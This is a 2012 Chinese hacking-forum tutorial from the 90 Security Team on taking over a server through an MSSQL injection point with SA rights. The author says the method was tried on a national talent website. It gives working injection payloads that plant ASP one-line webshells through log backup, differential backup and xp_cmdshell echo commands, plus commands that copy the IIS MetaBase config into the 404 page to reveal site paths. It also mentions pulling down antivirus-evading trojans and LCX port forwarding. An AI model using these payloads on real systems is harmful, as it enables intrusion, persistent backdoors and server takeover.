找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2578|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
  I2 H4 b* k" o0 o; w  U! }- W$ s% Z$ J! G+ v; P$ m
4 V- ?2 {- `4 e% f* Z. Y
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。" g, ^( ^/ k( `5 X" G
, p- E9 R9 f: N
                                                                 
" g: |/ A; L  S0 P% y                                                                 
2 o% F4 ^; S; ~) w                                                                  论坛: http://www.90team.net/
6 V0 p& X2 h( _4 M' ^  t$ L5 I# I3 l8 a% H
: x& U. E6 f. o* F8 ?  r

" S' H: }' G* {4 s4 b1 X3 @友情检测国家人才网! O! @5 c9 I) d+ M/ A
6 F( {' o% D, _3 j% H  _& w
' o; ~  C" _/ S- I
内容:MSSQL注入SA权限不显错模式下的入侵
0 v3 P3 m; C8 {# U( R* q$ E
  h7 D4 y! a3 n+ M& _$ l2 O$ M. g2 U2 r
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。# H% J; g7 ]- @! n: f) ~
( U4 j2 U) X" e& ^9 a
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。% I& r) E- l4 @% o0 c6 T) @) @( K
% {1 Y) @8 f' O& m% C! V, s

) D+ X. Y% i: Y4 M: n2 I这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。2 J) S( S$ ~# F$ D4 f2 s
( z/ G1 J" Y. z3 W- h" z9 l% Q' w
思路:
6 j! m) t# W1 u4 J& A0 s+ V; A8 ^
' X& s+ R# x8 u' y$ C/ v首先:+ }$ ^3 ]: N' F0 p7 j. v
+ p) V+ C& W. A) a: L5 L" w8 d  A
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。2 v6 V2 K4 ]# {& I* r& n" G1 E
+ |, v; G9 ?% M1 N( B$ A* e' n
1.日志备份获得Webshell
6 r/ ]$ e/ S' D4 ?. e" `: k' u
, J: I4 A7 [0 r2 i: l" ~2.数据库差异备份获得Webshell8 O$ E" y: v1 S) t7 p; e6 h4 p+ V

2 p3 ~& ^3 E+ a2 G0 T4.直接下载免杀远控木马。
6 }6 P0 C7 q- j! D! [
9 A/ m$ J: r% g7 v9 o5.直接下载LCX将服务器端口转发出来
) R; R" a9 ?" d* D5 x& J$ ?, `/ X4 N
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。2 @; k* r. x$ ?! A, t; K+ I3 i+ h/ L

$ k; `. q0 @0 H# ~; |1 B3 [) w0 g. c, w  {, O

% N$ P% B$ t0 I7 }% B% r+ ]在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, / j& V8 Q4 l3 u

2 ~6 @6 Y. O* v我直接演示后面一个方法
3 V2 m; k, b+ ?' K: D$ g
: k7 F# o" {3 l" v8 _9 ]1 ~" j7 f  }0 ~2 ~" [0 j
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
7 i9 s! ?6 M4 |: F' `
  g1 a% o- J7 U  V5 K, r$ e8 g$ V0 c- ?. w1 d* e9 Z
9 M5 y8 x9 f" d1 V

) M8 G' c) @" I/ {1 g1 M3 z2 [◆日志备份:
0 F8 P6 d5 H& h5 u* [5 \% H) k2 z) z# z9 h" O5 v
3 B% G5 G' N$ V8 t. @# L/ k. }1 ^
1. 进行初始备份
0 u! }4 M; N$ M6 v8 X; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--$ X9 |5 P$ v3 l1 `- I3 z% }1 h

( t7 W$ V+ v- ^" H, b- f2. 插入数据  ]  s- w+ k, b% _8 Y
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--; x6 j: ^' d  @2 }/ \' c. |& d

/ w! D6 v; V. p) e5 B) m0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
; O& q/ y4 n7 C5 ]3 z  
8 i( s9 B2 V8 x- g: y6 l/ A" W2 C/ b- s3. 备份并获得文件,删除临时表
5 g  m5 G8 u: s2 l' [;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--& a' c7 F, T: a: p6 q& y

, u" Z# y$ q8 \2 Q& x. `- a: ^$ @/ Y

' n2 e& A+ I2 K) c9 k& `◆数据库差异备份, O! C0 |% Q) H; N# x# V

9 L8 n7 d* A  G4 V6 w; N/ V(1. 进行差异备份准备工作6 o. o, {6 v; Y. A2 d: K
: @0 C7 f( N2 d7 d0 {. C4 ?9 F
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--) w  P) b) n; F: _5 W9 E( J9 M

9 Q! F' c! A; A上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码0 D+ J) l% K2 c# v. c& u

; s) T! \9 U9 K; S
/ u6 V, D7 x" t3 R(2. 将数据写入到数据库$ ~8 Z+ \2 F  C8 b- v
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- + h, |) b9 N6 l( n3 o

8 D: J5 {# E: E8 r! i) A8 ]: ^0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
, Q2 a) U6 n7 r4 X0 P5 I- V7 O1 W# w% M: H
3. 备份数据库并清理临时文件* O- v* H+ k; V; y

5 D3 Z/ }1 V& L$ g9 u$ P1 S: J;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--: v! v  k+ j' Z' ?0 n

8 C" }& b( D" L7 N8 D( `9 R0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
6 Q7 U7 D3 j9 h9 l3 \# [) n( g& d/ H1 ^) P; z1 x

" f# B# w, s% K  u; k" E- s: o2 o$ x; _1 L8 B" G1 j$ a
用^转义字符来写ASP(一句话木马)文件的方法:   
$ d) N: C6 B) P* f% m8 g( g& D' c. E4 U+ f+ P. @: {
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--. ?; {9 b7 M/ C: g, U2 ?$ b$ s

2 [/ D( \8 R- j$ X2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
* S; g, N* ?/ t# b2 i
$ \' d& i& O" a: U4 r% _# C$ ?- r5 w! m读取IIS配置信息获取web路径! e/ T5 x, Q" m/ c4 d$ o+ H

+ I4 I+ m8 p+ F1 G1 A1 G  ?     ( j7 ?0 y' c5 u& ?1 F
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--: G$ _, U: L/ e0 j0 z

$ d. n6 C0 _# o( y0 g' {1 D执行命令( a$ \7 E  l+ c# _. x! z; B4 i
     5 X. @, `4 Y6 |+ D* q5 E7 V
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
9 G& N: w, I4 N$ ^1 \# r- v3 D+ b9 |" v; Z
1 V8 L( k, J) G3 u

2 F! w& B: y5 D+ O2 a( ^
4 ]# r2 J. o: v6 ^! P( z9 X% ]4 h& d6 e1 K8 s, ]7 x- X( [

0 T6 x0 P. C; A) P) N5 k" W( b# }4 g. S& p# D/ |* t+ {
( g: P7 e! b1 f8 ~

" M+ ^* t9 A+ f/ _2 O& N# t" @- {9 I$ |# X: ]: P
8 C& F. g7 K2 [% o/ v
3 ]0 `& K( g) G: S' x/ D

: }: s9 T7 ^( l) t$ m+ v9 P4 M: i$ c0 ]  h5 m

$ D7 j2 q' F( X0 e$ t" j3 b$ |2 t0 h# W+ F5 \; O5 c0 _- e* V

  S4 ~  a, B+ C3 N) F
+ C. z) y5 L2 S. ]' Q: X% Z" k: i  u, V. P5 D1 Q9 T
" Z% ]  m$ R+ E; j" U

' }2 O+ G3 N4 x
( T! v( ?( ^8 @( i" f- a+ M% b+ d1 i) e( s* M) {( Z
; \% |9 n3 _" g& f( n9 P

, E# r% C" T+ _7 k' e
/ G) g, _" m1 s5 ^; h  J6 S9 b2 y! {. @
$ J8 `* P& I, T; M& \' _4 `+ W
! ~) @5 {2 k  S" o
. W# K7 F4 Y/ d/ k3 v% v4 N$ E! d
1 u. c! W3 O3 J* }
: w. U( X9 o9 Z( d7 e0 a
! e$ |1 c' M: S

  o9 F5 R) M& @/ m3 h+ L+ E+ k5 k8 c9 N1 w" O$ k1 [

4 n$ M9 T! x3 b1 j. x$ _! T% y/ s  y# B! y, i7 l# q

; _$ _6 Q; `% X9 d* `
" ^# O# |  A3 ]2 Q" f
4 o' f5 M& ~2 r. v  G* M, h% S- C  A+ l. W
. [1 ~/ x8 D; h

: s8 h' T8 I0 t' _. A- i. x# V0 V3 \, f  o1 l: `, n

9 E+ l9 z! W& X1 o% X6 I
9 v/ _6 C2 |( f+ x- W. |" L+ ]% A+ C. ~
1 p2 J5 l$ C1 [0 f. ^4 Y# T  q1 _  G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表